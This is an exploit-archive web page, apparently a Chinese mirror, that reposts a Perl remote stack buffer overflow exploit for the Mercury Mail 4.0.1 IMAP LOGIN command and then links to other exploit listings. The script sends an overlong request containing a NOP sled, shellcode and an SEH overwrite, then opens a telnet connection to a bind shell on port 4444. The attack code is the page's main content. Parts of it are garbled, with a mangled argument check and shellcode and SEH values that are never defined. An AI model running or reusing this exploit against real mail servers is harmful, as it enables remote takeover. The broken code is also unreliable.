Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

所属分类: 网络安全 / Exploit 阅读数: 120
收藏 0 赞 0 分享
#!/usr/bin/perl
#
# http://www.securityfocus.com/bid/11775
# credit to Muts for this vulnerability
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
send $socket, $request, 0;
print "[ ] Sent 1st request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);
my $request ="\x41" x 255;
send $socket, $request, 0;
print "[ ] Sent 2nd request\n";
sleep(1);
my $request=("\x45" x7420).("\x90" x10).$happy.("\x90" x14).$shellcode.("\x41" x8).$nextseh.$seh.("\x90" x5).$jmp.("\x90" x533);
send $socket, $request, 0;
print "[ ] Sent final request\n";
sleep(1);
close($socket);
print " connect on port 4444 of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;
//http://www.leftworld.net
更多精彩内容其他人还在看

Maian Events 2.0 Insecure Cookie Handling Vulnerability

Author: Saime Date: July 12, 2008 Script: Maian Events v2.0 Insecure Cookie Handling Vulnerability URL: http://www.maianscriptworld
收藏 0 赞 0 分享

Maian Gallery 2.0 Insecure Cookie Handling Vulnerability

Author: Saime Date: July 12, 2008 Script: Maian Gallery v2.0 Insecure Cookie Handling Vulnerability URL: http://www.maianscriptworl
收藏 0 赞 0 分享

Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

################################################################# # # Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
收藏 0 赞 0 分享

Maian Cart 1.1 Insecure Cookie Handling Vulnerability

Author: Saime Date: July 12, 2008 Script: Maian Cart v1.1 Insecure Cookie Handling Vulnerability URL: http://www.maianscriptworld.c
收藏 0 赞 0 分享

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

#!/usr/bin/perl # # http://www.securityfocus.com/bid/11775 # credit to Muts for this vulnerability # acaro [at] jervus.it
收藏 0 赞 0 分享

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

#!/usr/bin/perl #---------------------------------------------------------------- # #Script : PhsBlog v0.2 # #Type : Bypass S
收藏 0 赞 0 分享

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

#!/usr/bin/perl #---------------------------------------------------------------- # #Script : Ezphotogallery 2.1 # #Type : Mu
收藏 0 赞 0 分享

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

<!-- Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC Summary: Maxthon Browser is a powerful tabbed browser built
收藏 0 赞 0 分享

minb 0.1.0 Remote Code Execution Exploit

#!/usr/bin/python ##################################################################################### #### minb
收藏 0 赞 0 分享

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com) Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista I
收藏 0 赞 0 分享
查看更多